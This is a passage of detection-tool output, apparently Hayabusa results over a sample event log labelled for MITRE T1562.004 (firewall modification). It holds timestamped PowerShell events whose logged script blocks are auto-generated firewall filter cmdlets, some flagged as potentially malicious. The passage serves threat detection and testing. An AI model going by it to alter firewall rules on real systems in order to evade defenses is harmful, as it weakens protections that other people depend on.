($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallAddressFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallAddressFilter' -Alias '*' function Set-NetFirewallAddressFilter { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('LocalIP')] [string[]] ${LocalAddress}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('RemoteIP')] [string[]] ${RemoteAddress}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallAddressFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallAddressFilter' -Alias '*'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:44.926 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:44.926 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:44.927 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetFirewallAddressFilter"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:44.927 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetFirewallAddressFilter"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:44.973 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetApplicationFilter' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetFirewallApplicationFilter { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetApplicationFilter')] param( [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Program}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Package}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Program') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Program}) $__cmdletization_queryBuilder.FilterByProperty('AppPath', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Package') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Package}) $__cmdletization_queryBuilder.FilterByProperty('Package', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleFilterByApplication', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallApplicationFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallApplicationFilter' -Alias '*' function Set-NetFirewallApplicationFilter { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetApplicationFilter')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetApplicationFilter')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Program}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Package}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Program')) { [object]$__cmdletization_value = ${Program} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AppPath'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AppPath'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Package')) { [object]$__cmdletization_value = ${Package} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Package'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Package'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallApplicationFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallApplicationFilter' -Alias '*'",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:44.973 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetApplicationFilter' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetFirewallApplicationFilter { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetApplicationFilter')] param( [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Program}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Package}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Program') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Program}) $__cmdletization_queryBuilder.FilterByProperty('AppPath', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Package') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Package}) $__cmdletization_queryBuilder.FilterByProperty('Package', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleFilterByApplication', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallApplicationFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallApplicationFilter' -Alias '*' function Set-NetFirewallApplicationFilter { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetApplicationFilter')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetApplicationFilter')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Program}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Package}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Program')) { [object]$__cmdletization_value = ${Program} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AppPath'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AppPath'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } 